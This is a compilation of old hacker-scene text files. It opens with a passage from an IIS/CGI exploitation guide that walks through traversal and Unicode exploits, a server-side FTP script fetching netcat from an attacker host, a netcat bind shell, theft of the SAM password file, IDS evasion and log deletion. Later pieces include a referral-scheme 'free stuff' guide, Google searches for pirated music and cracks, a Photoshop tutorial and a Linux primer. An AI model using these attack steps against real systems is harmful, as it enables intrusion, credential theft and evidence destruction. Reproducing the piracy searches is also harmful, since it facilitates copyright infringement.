
and lets do the same thing but encode the URL to bypass security checks:

  my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with
poison null bytes. Stop now and go read it... can't be arsed? ok then, 
here's the quick version. is valid in a string with Perl but is NUL
in C. So? When Perl wants to open the file it makes a request to the
operating system through a system call. The operating system is written in
C and is a string delimiter. Lets apply this technique to the
following situation.

I decide to secure my CGI. I append '.html' to any request. This means that
the user can only view html files and if they try something else then it
doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

  my_cgi.pl?filename=../../../../etc/passwd

In Perl the filename string would look like this:

  "../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is
passed to the OS (which is written in C not Perl) the request looks like
this:

  "../../../../etc/passwd"

The OS identifies as the string delimiter and ignores anything that
Comes after it. The webserver then displays the /etc/passwd file... bugger :-(

Many people download scripts from the web and look for problems in the
script. Then the wiley hax0r will go to altavista and search for sites
that are using that script, eg:

  url:pollit.cgi

and good old altavista provides a list of sites that are just ripe for the
taking.

The final method of exploiting CGI is via buffer overflows. Languages like
Java and Perl are immune to buffer overflows because the language looks
after memory management. Programs written in a language such as C are
vulnerable because the programmer is supposed to manage the memory. Some
programmers fail to check the size of data it is fitting into the memory
buffer and overwrites data in the stack.

The goal of the buffer overflow is to overwrite the instruction pointer
which points to the location of the next bit of code to run. An attacker
will attempt to overwrite this pointer with a new pointer that points to
attacker's code, usually a root shell.

Quite a few CGI's exist that are vulnerable to this type of attack. For
Example, counter.exe is one such CGI. By writing 2000 A's to the CGI cause
a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document.
Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

  http://www.phrack.com/phrack/49/P49-14


--[On the seventh day, God chilled and haxored the planet]

Well.. I guess its time we actually tried some of the things discussed but
I'm not going to cover everything. I suggest going to the following URL's
and searching for IIS:

  http://www.securityfocus.com/
  http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits
and so that is going to be the focus of the exploitation. The first exploit
I'm going to go through is the recent Unicode exploit for IIS4/5:

  http://www.securityfocus.com/bid/1806

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me
explain. This had wide exposure on Bugtraq as the Unicode exploit. In
reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep
calling this the Unicode exploit because its now referenced by this name in
the Bugtraq archives and you'll have to search using Unicode to do further
research.

Ok, rant over... To check if the server is exploitable, request the
following URL:

  http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server.
The important thing to note is that the Unicode string can vary depending
where in the world you are. Some possible alternatives include:

  %c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or
research UTF-8 for more alternatives.

OK, you can read the directory... what next? You have the directory listing
and the ability to run commands, so you need to find the web root. By default,
the web root is at:

  c:\inetpub\wwwroot\

If its not there then go and look for it. Let's write a text file there and
see if we can see it:

  cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem we can get
around that by creating a copy of the cmd.exe that has write privileges:

  cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

  http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Lets try and write to the web root:

  fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open up it up in the browser and see if we can see it:

  http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the
words of Microsoft, where do you want to go today? Working via the URL is
pretty clunky and I like the comfort of a nice command prompt, So lets do
that. I want to bring over a copy of netcat and a nice html page that I'll
use to replace the existing one.

First I need to think about the script I want to run that will get the
files I need from my FTP server:

 fugscript:
  open ftp.evilhaxor.com
  anonymous
  anon@microsoft.com
  cd pub
  get nc.exe
  get hacked.html
  quit

Right. I need to get this script onto the webserver:

  fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript
  fug.exe?/c+echo%20anonymous>>fugscript
  fug.exe?/c+echo%20anon@microsoft.com>>fugscript
  fug.exe?/c+echo%20cd%20pub>>fugscript
  fug.exe?/c+echo%20get%20nc.exe>>fugscript
  fug.exe?/c+echo%20get%20hacked.html>>fugscript
  fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step
is to execute the script and get my files from my web server.

  fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files
transferred. Be patient and give it time to transfer. Now you are ready to
get netcat listening on a port. The command line for starting netcat is:

  nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)
when someone connects. The last step is to translate this command into URL
speak ;-):

  fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and
voila... you have a cmd prompt. I really hate web defacements... so if your
going to do it then rename the existing index.htm (or default.htm) to
something like index.htm.old (give the poor admin a break, cause you can bet
your arse that he hasn't made a backup). ALSO: you are now using a system
without authorisation and as such, you are guilty under the Computer Misuse
Act in the UK and probably of something similar in your own country. If it
never occurred to you to delete the contents of c:\winnt\system32\logfiles
or the 'fugscript' file then you really shouldn't be doing this.



It just wouldn't be right to talk about IIS exploitation without mentioning
msadc.pl. rfp's perl script is a perfect example of exploit chaining. A
single exploit is not used but a chain of exploits to get the script to
work.

The exploit utilises a combination of inadequate application input validation
and default install fun. The process tries to connect to a Data Source Name
(DSN) to execute commands.

rfp's script tests for the existence /msadc/msadc.dll using the GET method.
This test will be logged and you should edit the script to make it a HEAD
request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME
separator string. It is advised to change this string as some IDS's are
configured to identify this string.

If you want to write your own scanners then you should be looking for
headers with the content type:

  application/x-varg

and of course the IIS version :-) I don't want to go into too much detail
because this is heavily documented on rfp's site:

  http://www.wiretrip.net/rfp/

How do I use it? I hear you cry... well, its child's play:

  ./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

  command:

Its interesting to note at this point that 'cmd /c' will is run as with the
previous exploit. You can edit the script to run any other executable such
as 'rdsik /s' instead.

This is good, you can know enter the command you want to run on the server.
The previous Unicode exploit should have given you some ideas but here's a
couple that come to mind:

  Example 1:
  copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

  (grabbing fug.hak via your browser should give you a nice file to fire up
   in L0phtcrack or JTR)

  Example 2:
  echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript
  && echo mypassword>>fugscript... etc. etc.
 
Anyway, that's about all for now. When I can be bothered I'll add some more
methods to this file. Until then, ensure your box is fully patched and the
default scripts are removed. Go have a look at the following URL and get
secure:

  http://www.microsoft.com/security/

***************************************************************************
Greetz to: ReDeeMeR, BarnseyBoy, Reeferman, gabbana, think12, Wang, Enstyne,
           [502BOP], Muad_Dib, Macster, n0face, palmito, kph, Homicide, Col,
           Axem, Booto, _Penguin, nsh, Chawmp, shad, hellz and everyone in
           #CA who are way too numerous to mention.
***************************************************************************


Guide For Getting Free Stuff

Guide For Getting Free Stuff

Guide For Getting Free Stuff

Ok, if you are like me you have heard so much about the FreeIpods and FreeFlatScreens websites on different forums, blogs, IM's, etc, you are about to puke. So am I. But yet the draw of getting an Ipod for doing basically nothing is pretty strong. I dismissed all the "stories" of people getting their ipods as the marketing machine at work. However, when Kevin Rose published that not only did he receive his, but a few of his friends did as well, I figured I might take a chance and give it a go. Today I received proof that it does indeed work. Yep, I got my iPod.

Whats in it for them?
Step 1. Collect Names.
Step 2. Send those names items worth $200 or more
Step 3. ?????
Step 4. Profit

Before I signed up, I wanted to get to the bottom of the ?????. I didn't want any sweaty, filth pushing webmonkeys to have all my info, so I did my research. Gratis Internet, the parent company of the FreeIpods, FreeFlatscreens, etc. sites, recently did an interview with Wired Magazine.
In this article Gratis states that they are acting as Head Hunters for companies (more on that later) and are paid between $50-$90 per referral. Although this seems like a lot of money, this is nothing compared to what these companies spend for print advertising which does not guarentee ANY customers. So now we know what ?????? equals. ??????=$50-$90 for Gratis per guranteed customer (referral sites).

How Does it Work?
You sign-up on one (or more) of the following websites:

http://www.FreeMiniMacs.com/?r=14098976
This site gives away free Mini Macs. At the time of this writing only the 80gb MiniMac was available.

http://www.FreeDesktopPC.com/?r=13082204
This site gives away free flat screen monitors and TVs. At the time of this writing the following flat screens were available: Sony 19" LCD, Samsung 15" SyncMaster 510MP LCD TV, Samsung SyncMaster 710N LCD Monitor, Sony 27" FD Trinitron WEGA TV, or a 24" Toshiba TV/VCR/DVD combo

http://www.FreeGamingSystems.com/?r=12660654
This site gives away gaming systems. At the time of this writing the Slim PS2, Xbox, Nintendo Gamecube, and Nintendo DS were available.

http://www.FreeHandbags.com/?r=13950244
This site gives away high-end handbags. Might be a good surprise for your wife or girlfriend. =) At the time of this writing the following bags were available: Prada Mini-Hobo (black, Pink, Powder Blue), Burberry Novacheck Minisling, Coach Signature Demi Pouch (black, camel, purple), Kate Spade Pia Pochette (Black, Pink, Red)

http://www.mp3players4free.com/default.aspx?r=82419
This site gives out free mp3 players. You can get paypal $275, ipod, rio carbon, iriver, ipod mini.

http://www.dvrs4free.com/default.aspx?r=90581
This site gives away TiVo, Replay TV, and $275 paypal.

http://www.macminis4free.com/default.aspx?r=181183
Another mini mac site.

http://www.cameras4free.com/default.aspx?r=90773
This site is giving away high end digital cameras. At the the time of writing this, you follow cams are available: Canon Powershot S1 IS, Sony DSC-P100, Sony DSC-W1, Canon Powershot A95, $325 paypal.


Ok, so here is the tricky part. Once you sign up with one of these websites, you have to complete an "offer" from gratis's advertisers. There are numberous offers, some being better than others. Now remember the ???? = $50 - $90 equation? In order for you to receive your ipod/Flatscreen/Desktop PC/Handbag you have to refer 5, 8, or 10 of your friends, and they have to complete one of the offers as well. Then in order for them to receive theirs they need to refer others, and so on. So lets just look at why they are going to send an Ipod to you. (1(you) + 5(your friends)) x $90 = $540 - $250(ipod) = $290 profit for them just for you signing up. The advertisers are more than willing to pay, and FreeIpods is more than happy to send you your ipod. Works out for everyone.

What is the basic "lingo"?
"ref"/"referral" = The thing required to get your free items. These are your friends.
"green" = Status indicator that means your offer has been completed.
"yellow" = Status indicator that means your offer has yet to be completed or is in the process/pending.
"hold" = Means your account has been suspended or stopped. DON'T CHEAT.
"STV" = Means your product has been "Shipped To Vendor" You should recieve it in about 10 days time.

What process should you use to sign up (to ensure that you will get your item)
When signing up, it is recommended that you use Internet Explorer (sucks) some people have reported problems using other browsers (ex. Firefox, opera, etc.) Also make sure you have cookies accepted.

1. Click on one of the links above and enter a VALID US mailing address.

2. Complete the marketing survey - not your answers do not have any impact on you receiving your item. Just say no to them.

3. Once you have signed up, you should receive a verification email. If you did not receive one, go to the "My Account" page and click the link to have them resend it. If you still did not get it check your spam folder.

4. Sign-up with one of their partners and complete the offer. (see the section which offer should I choose) It can take up to 15 days for your offer to show completed. (A term that we freebie goers use for a "completed offer" is called "credit.") But usually they show completed after 24 hours. Be patient. If it doesn't show up as completed, you can email the site with proof and confirmation for signing up and they will give you credit.


Which offer should I choose?
Just so you know all offers require a credit card, **HOWEVER** not all of them cost anything! =) Here is a list of my recommended offers and I have not had any problems whatsover with doing these.

* Video Professor: This requires a credit card and pay only $3 shipping for computer tutorial CDs. After you receive the CDs, just call customer support and cancel your membership. Return to sender the CDs and they will refund you the shipping costs.

* Complete Home: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Lowes Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Buyer's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Circuit City Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Great Fun: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Walkie Talkie just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Traveler's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Thin Digital Camera just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* eFax Plus: Sign up for their fax service. You get a 30 day free trial. Upon receiving credit for doing the offer, simply cancel the service within the free trial and pay nothing! It usually take 1-3 days to receive credit for this offer.

* Blockbuster Online: Try a two week trial of Blockbuster's Netflix-like service. Cancel online within trial time and pay nothing.

*Zooba: If you are a book fan, sign up for this offer. You get a book for $10 with free shipping. Instant verification.

*Various Credit Card offers: Apply for a credit card and get approved. When it arrives, cut it up and toss it out. Nothing to cancel, nothing to pay, and free stuff to gain!

Many of these offers are big companies, so you do not have to question the legitimacy for signing up under them. In other words, you will be safe because you are giving your credit card information to aol, blockbuster, and general motors, and i highly doubt that they will sell this info.

These are free, as long as you cancel within the trial period. Some offer online cancellations while others require calling their support number. Just tell them that you dont find yourself using their services enough so you want to cancel and they'll cancel your membership without any problems.

Cheating
Many of these free sites take cheating very seriously. If you want your free gift and not have you account suspended, simply DON'T CHEAT! Don't refer yourself and do all the offers yourself. If you think you can cheat the system because you are a 1337 h4x0r and you can use proxies and IP spoofs to refer yourself, DON'T DO IT. When you are in the approval stage, they will intensely throughly examine your account and make sure that all your referrels are legit and unique. Trust me, I know many people who have gotten suspended for attempting to cheat.

Multiple Accounts
This goes under cheating. It is wise not to create multiple accounts under the same site because it is against the free site's TOS. They suspend you no matter what your reason is, even if it was an accident. This also includes referring family members. You can only create one account under one household, under one IP address per site. So you cannot refer mother, sister, or brother to do it unless they live in another household.

So you've ran out of offers to do. What do I do?
Ok, if you are a freebie freak, you will probably eventually run out of offers to do because of the fact that you signed up for so many free sites did all the easy free offers. What shoud you do? Remember that free sites give you credit for a unique signup for the offers. So if you signed up for blockbuster online offer at freeflatscreens, you cannot do it again for another free site such as freedesktoppc. But there is a trick to this. A unique signup = a unique credit card that you used to sign up. So if you have a another credit card, you can sign up for the offer again. Another method is to purchase a visa gift card from your mall, or go to www.webcertificate.com and purchase a virtual debit/credit card and do the offers with those.

If you followed all these steps correctly, your free gift will be delivered to your doorstep in no time.

Here are the steps:
1. Getting friends to sign up under you
2. Approval Stage: They will analyze your account for fraud. Takes 1 week.
3. Pending Stage: Your account have been approved. You are now processing. This will take 1-2 weeks.
4. STV: Sent to Vendor. Your product will arrive in 10 days.
5. Shipped: Congrats!

Most of these freebie sites are for U.S residents only.

Graffiti On Walls 4 Adobe Photoshop Cs 8.0

Graffiti On Walls 4 Adobe Photoshop Cs 8.0

Graffiti On Walls 4 Adobe Photoshop Cs 8.0

Graffiti On Wall Tutorial For
Photoshop Cs 8.0

For This Tutorial You Must Have A Basic Understanding Of Adobe Photoshop Cs 8.0, Example : Where The Features Of The Program Are.
CODE

For This Tutorial You Will Need The Font Called Political Graffiti FIll Which Can Be Aquired Here:
http://www.dafont.com/en/font.php?file=political_graft

And

The Starting Wall Picture Which Can be Aquired Here:
http://www.imagehosting.us/imagehosting/showimg.jpg/?id=59054





(1). Open Photoshop Cs 8.0

(2). Open Wall Picture

(3). Type Ur Second Name In Red At 210pt Font Size In The Political Graffiti Fill Font.

(4). Click Icon All The Way At The Topright That Looks Like A T With A Rounded Line Under It. (Warp Text)

(5). Distort Style Squeeze Vertical, Bend = -31%, Horizontal Distortion = +18%, Vertical Distortion = +34%

(6). Layer> Layer Style> Blending Options, General Blending> Opacity 79%> Fill Opacity 100%, Blend If: Gray, Underlying Layer Black 60, White 210

(7). Type Ur First Name In Red At 210pt Font Size In The Political Graffiti Fill Font.

(8). Click Icon All The Way At The Topright That Looks Like A T With A Rounded Line Under It. (Warp Text)

(9). Distort Style Squeeze Vertical, Bend = +50%, Horizontal Distortion = 0%, Vertical Distortion = -31%

(10). Layer> Layer Style> Blending Options, General Blending> Opacity 79%> Fill Opacity 100%, Blend If: Gray, Underlying Layer Black 60, White 210

(11). Duplicate Both Layers

(12). Move Copied Layers One On Top Of The Other (In The Layer Menu)

(13). Hide The Original Ur Second Name And Ur First Name Layers By Clicking The Eye Icons So That They Dissapear.

(14). In The Copies, Right Click (One At A Time) And Click Rasterize Layer.

(15). Go to Layer> Merge Down (Ctrl + E) (On Top Name Layer).

(16). Layer> Layer Style> Stroke Change Color To Black, Size to 8, Then Opacity To 68%.

(17). Save If No Blur Effect Wanted

(18). Filter> Blur> Smart Blur> Mode: Overlay Edges, Threshhold 48%, Radius 6, Quality: High.

(19). Layer> New Layer

(20) Brush Tool (B), Paint Brush With The Soft 16pt Airbrush For Spraypaint Effect.

(21). Smuge Around Graffiti For Paint Smudge Look For Good Effect (Optional)

(22). Save.


Finito

Final Images:

CODE
Graffiti With Blur:
http://www.imagehosting.us/imagehosting/showimg.jpg/?id=59056

Graffiti No Blur:
http://www.imagehosting.us/imagehosting/showimg.jpg/?id=59057

Google Tips & Tricks, (utilizing search engine)

Google Tips & Tricks, (utilizing search engine)

==================================================
Utilizing search engines
==================================================

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook


Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

Google secrets

Google secrets



Google secrets

--------------------------------------------------------------------------------

method 1
?ww.google.com

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

voila!

method 2
?ww.google.com

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

Google Crack Search

Google Crack Search


Just type crack: app name

example: crack: flashget 1.6a


http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a

Go to Windows updates anonymously

Go to Windows updates anonymously

Would you like to use the Windows Update feature without being forced to register with Microsoft? OK then, this is what you can do:

Launch good ol' Regedit.
Go down to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion.
Look for a value named RegDone. If it isn't there create a new value with that name.
Right click the new value and choose Modify. Make the value 1.
Close Regedit and
Enjoy!

Getting started with Linux for nOObs!

Getting started with Linux for nOObs!

I. What is Linux?
II. Trying it out
III. Installing
IV. What to do now
V. The Console

Intro:
This tutorial is written with the total Linux n00b in mind.
I've seen too many n00bs get totally left in the dark by asking what
the best distro is. They seem to only get flooded with too many
answers in so short a time. I'm a little bit of a n00b too, so I know
how it feels. I will cover a grand total of two basic distros. You may
learn to strongly prefer other ones (I do!) but this is just to get
you started. I touch on a number of topics that would be impossible to
go into in depth in one tutorial, so I encourage you to actively seek
out more about the concepts I make reference to.


I. What is Linux?

Linux is basically an operating system (OS for short). The Windows
machine you're (probably) using now uses the Mcft Windows
operating system.

Ok, so what's so different about Linux?

Linux is part of a revolutionary movement called the open-source
movement. The history and intricacies of that movement are well beyond
the scope of this tutorial, but I'll try and explain it simply. Open
source means that the developers release the source code for all their
customers to view and alter to fit what they need the software to do,
what they want the software to do, and what they feel software should
do. Linux is a programmer?s dream come true, it has the best compilers,
libraries, and tools in addition to its being open-source. A
programmer's only limit then, is his knowledge, skill, time, and
resolve.

What is a distro?

A distro is short for a distribution. It's someone's personal
modification or recreation of Linux.

What do you mean by distros? I just want Linux!

Since Linux is open source, every developer can write his own version.
Most of those developers release their modifications, or entire
creations as free and open source. A few don't and try to profit from
their product, which is a topic of moral debate in the Linux world.
The actual Linux is just a kernel that serves as a node of
communication between various points of the system (such as the CPU,
the mouse, the hard drive etc.). In order to use this kernel, we must
find a way to communicate with it. The way we communicate is with a
shell. Shells will let us enter commands in ways that make sense to
us, and send those commands to the kernel in ways that makes sense to
it. The shell most Linux's use it the BASH shell (Bourne Again SHell).
The kernel by itself will not do, and just a shell on top of the kernel
won?t either for most users; we are then forced to use a distribution.

What distro is best?

This is not the question you want to ask a large number of people at
one time. This is very much like asking what kind of shoe is best,
you'll get answers anywhere from running shoes, hiking boots, cleats,
to wingtips. You need to be specific about what you plan on using
Linux for, what system you want to use it on, and many other things. I
will cover two that are quick and easy to get running. They may not be
the best, or the quickest, or the easiest, or the most powerful, but
this is a guide for getting started, and everyone has to start
somewhere.

How much does it cost?

computer + electricity + internet + CD burner and CDs = Linux
I'll let you do your own math.
Note however that a few do charge for their distros, but they aren't
all that common, and can be worked around. Also, if you lack internet
access or a CD burner or CDs or you just want to, you can normally
order CDs of the distro for a few dollars apiece.



II. Trying it out.

Wouldn't it stink if you decide to wipe out your hard drive and install
Linux as the sole operating system only to learn that you don't know
how to do anything and hate it? Wouldn?t it be better to take a test
drive? 95 out of a 100 of you know where I'm heading with this section
and can therefore skip it. For those of you who don't know, read on.

There are many distros, and most distros try to have something that
makes them stand out. Knoppix was the first live-CD distro. Although
most of the other main distros have formed their own live-CDs, Knoppix
is still the most famous and I will be covering how to acquire it.

A live-CD distro is a distribution of Linux in which the entire OS can
be run off of the CD-ROM and your RAM. This means that no installation
is required and the distro will not touch your hard disk or current OS
(unless you tell it to). On bootup, the CD will automatically detect
your hardware and launch you into Linux. To get back to Windows, just
reboot and take the CD out.

Go to the Knoppix website (www.knoppix.com). Look around some to get
more of an idea on what Knoppix is. When you're ready, click Download.
You'll be presented with a large amount of mirrors, some of which have
ftp and some of which have http also.

note: the speed of the mirrors vary greatly, and you may want to
change mirrors should your download be significantly slow.

Choose a mirror. Read the agreement and choose accept. You'll probably
want to download the newest version and in your native language (I'll
assume English in this tutorial). So choose the newest file ending in
-EN.iso

note: you might want to also verify the md5 checksums after the
download, if you don't understand this, don't worry too much. You just
might have to download it again should the file get corrupted (you'll
have to anyway with the md5). Also, a lot of times a burn can be
botched for who-knows what reason. If the disk doesn?t work at all,
try a reburn.

Once the .iso file is done downloading, fire up your favorite
CD-burning software. Find the option to burn a CD image (for Nero, this
is under copy and backup) and burn it to a disk. Make sure you don't
just copy the .iso, you have to burn the image, which will unpack all
the files onto the CD.

Once the disk is done, put it in the CD-ROM drive and reboot the
computer. While your computer is booting, enter CMOS (how to get to
CMOS varies for each computer, some get to it by F1 or F2 or F3, etc.)
Go to the bootup configuration and place CD-ROM above hard disk. Save
changes and exit. Now, Knoppix will automatically start. You will be
presented with a boot prompt. Here you can input specific boot
parameters (called cheatcodes), or just wait and let it boot up using
the default.

note: Sometimes USB keyboards do not work until the OS has somewhat
booted up. Once you?re actually in Knoppix, your USB keyboard should
work, but you may not be able to use cheatcodes. If you need to,
attach a PS/2 keyboard temporarily. Also, if a particular aspect of
hardware detection does not work, look for a cheatcode to disable it.
Cheatcodes can be found on the Knoppix website in text format (or in
HTML at www.knoppix.net/docs/index.php/CheatCodes).

Upon entering the KDE desktop environment, spend some time exploring
around. Surf the web, get on IM, play some games, explore the
filesystem, and whatever else seems interesting. When your done, open
up the console (also called terminal, xterm, konsole, or even shell)
and get ready for the real Linux. See section V for what to do from
here.

note: to function as root (or the superuser) type su.


It's not entirely necessary that you are a console wizard at this point
(although you will need to be sooner or later), but a little messing
around wont hurt.

Just as there are many Linux distros, so there are also many types of
Knoppix. I won?t go into using any of them, but they should all be
somewhat similar. Some of them include: Gnoppix, Knoppix STD, Morphix,
and PHLAK. Other distros also have live-CDs.

III. Installing

I will guide you through the installation of Fedora Core 2. The reason
I chose Fedora is because it contains the Anaconda installer, which is
a very easy installer.

Download the discs from here:
http://download.fedora.redhat.com/pub/fedo...ore/2/i386/iso/
If the link doesn?t work, then go to www.redhat.com and navigate your
way to downloading Fedora (odds are your architecture is i386).
You will want to download the FC2-i386-disc1.iso and burn it using the
method for Knoppix. Do the same for all the discs.

Note: do NOT download the FC2-i386-SRPMS-disc1.iso files.

Now, once you?re ready, insert disc 1 into the drive and reboot.

The installer should come up automatically (if not, then see the
Knoppix section on CMOS).

Note: installer may vary depending on version. Follow directions best
you can using your best judgement.

1. Language: choose English and hit enter
2. Keyboard: choose us (probably) and hit enter
3. Installation media: choose local CDROM (probably) and hit enter
4. CD test: you can choose to test or skip
5. Intro: click next
6. Monitor: choose your monitor to the best of your ability, if you?re unsure, choose on of the generic ones
7. Installation type: choose which ever you want (default should be fine)
8. Partition: choose to automatically partition (unless you know what you?re doing)
9. Partition: the default partitions should suffice
10. Boot loader: choose your boot loader (grub for default)
11. Network settings: choose the correct settings for your network (generally, don?t mess with anything unless you know what you?re doing)
12. Firewall: you can choose a firewall if you want to
13. Language support: choose any additional language support you want
14. Time zone: pick your time zone
15. Root password: set your root password (root is the admin, or superuser; you want it to be very secure)
16. Packages: choose which packages you want to install. For hard drives over 10 gigs, you can go ahead and choose all
packages (depending on how much disk space you plan on taking up later, note that most everything you?ll need is a package: the exception
being large media files). You will generally want to install all the packages you think you?ll ever need. Two desktop environments aren?t necessary.
Make sure you have at least one and the X window system! (if you want a GUI that is). I suggest you get all the servers too.

Note: Knoppix uses the KDE Desktop environment

17. Make sure everything is all right, and install
18. You can create a boot disk if you want

Note: Desktop environments might have a set-up once you enter them

IV What to do now

Now that you have a Linux set-up and running, there are many paths you
can head down. First, you should explore your GUI and menus. Browse
the web with Mozilla, get on IM with GAIM, play games, add/delete
users, check out OpenOffice, and anything else that might be part of
your daily use. Also, set up a few servers on your computer to play
around with, specifically SMTP (*wink*wink*), FTP (vsftp is a good
one), and either telnet or SSH (OpenSSH is a good one). The setup and
use of these are beyond the scope of this tutorial, but researching
them could prove to be very educational.

The filesystem
The Linux (and Unix) filesystem is different from the normal Windows
that you?re used to. In Windows, your hard drive is denoted ?C:\? (or
whatever). In Linux, it is called the root directory and is denoted
?/?. In the / directory, there are several default folders, including
dev (device drivers) mnt (mount) bin (binaries) usr (Unix System
Resources) home, etc, and others. I encourage you to explore around
the whole file system (see section V) and research more.

